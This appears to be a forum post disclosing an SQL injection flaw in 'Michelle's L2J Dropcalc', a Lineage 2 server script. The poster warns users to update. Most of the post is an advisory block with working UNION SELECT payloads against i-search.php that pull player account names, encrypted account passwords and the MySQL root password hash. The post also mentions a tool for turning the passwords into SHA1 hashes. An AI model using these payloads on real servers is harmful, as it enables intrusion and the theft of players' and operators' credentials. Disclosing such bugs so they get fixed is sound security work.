- Joined
- Feb 3, 2007
- Messages
- 1
- Reaction score
- 0
Hi.
As the topic says. There's a bug in that script (Michelles L2J Dropcalc).
If you use this script, then i recommend you to check the error and update if necessary.
The bug:
Complete info:
Bye.
As the topic says. There's a bug in that script (Michelles L2J Dropcalc).
If you use this script, then i recommend you to check the error and update if necessary.
The bug:
#==============================================================================================
# Title: Michelle's L2J Dropcalc
# Version: <= v4
# Web Site:To view the content, you need to sign in or register
#
# Discovered By: Codebreak ([email protected] |To view the content, you need to sign in or register)
#
#==============================================================================================
# SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
#To view the content, you need to sign in or register[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[SQL]
#
# Example:
#
# Obtain a player username:
#To view the content, you need to sign in or register[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
# Obtain a password for that username (*** encrypted):
# * only valid if loginserver and gameserver are in the same machine
#To view the content, you need to sign in or register[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[USERNAME]"
#
#
# Bonus:
#
# Obtain MYSQL Password (encrypted):
# *only valid if the script is executed with root accounts.
#To view the content, you need to sign in or register[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#
# *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file
#
###############################################################################################
Complete info:
To view the content, you need to sign in or register
Bye.